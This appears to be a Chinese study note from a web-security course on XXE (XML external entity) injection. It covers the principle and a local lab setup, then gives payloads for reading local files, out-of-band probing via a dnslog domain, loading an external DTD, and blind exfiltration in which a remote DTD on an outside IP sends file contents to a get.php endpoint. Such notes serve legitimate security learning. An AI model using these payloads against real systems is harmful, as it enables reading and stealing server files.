本文主要是介绍day41WEB 攻防-通用漏洞XMLXXE无回显DTD 实体伪协议代码审计,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
链接:https://pan.baidu.com/s/1TrPpubuF_Yqa4f12J-dljQ?pwd=8j7i
提取码:8j7i
XXE 黑盒发现:
XML&XXE-黑盒-原理&探针&利用&玩法等
参考:https://www.cnblogs.com/20175211lyz/p/11413335.html
漏洞利用原理
客户端:xml发送数据
服务端:xml解析数据
利用xml写一个带有文件读取的代码尝试发送,类似文件功能读取实现
漏洞复现
环境搭建(本地搭建)

1、读取文件:
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/e.txt">
]>
<user><username>&test;</username><password>Mikasa</password></use
r>
2、带外测试:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://9v57ll.dnslog.cn">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></use
r>
3、外部引用实体 dtd:
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
%file;
]>
<user><username>&send;</username><password>Mikasa</password></use
r>
evil2.dtd
<!ENTITY send SYSTEM "file:///d:/e.txt">
4、无回显读文件
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/e.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
test.dtd
<!ENTITY % all "<!ENTITY send SYSTEM
'http://47.94.236.117/get.php?file=%file;'>">
XML&XXE 前端 CTF& Jarvisoj& 探针 利用
XML&XXE 白盒 CMS& PHPSHE& 无回显审计
这篇关于day41WEB 攻防-通用漏洞XMLXXE无回显DTD 实体伪协议代码审计的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!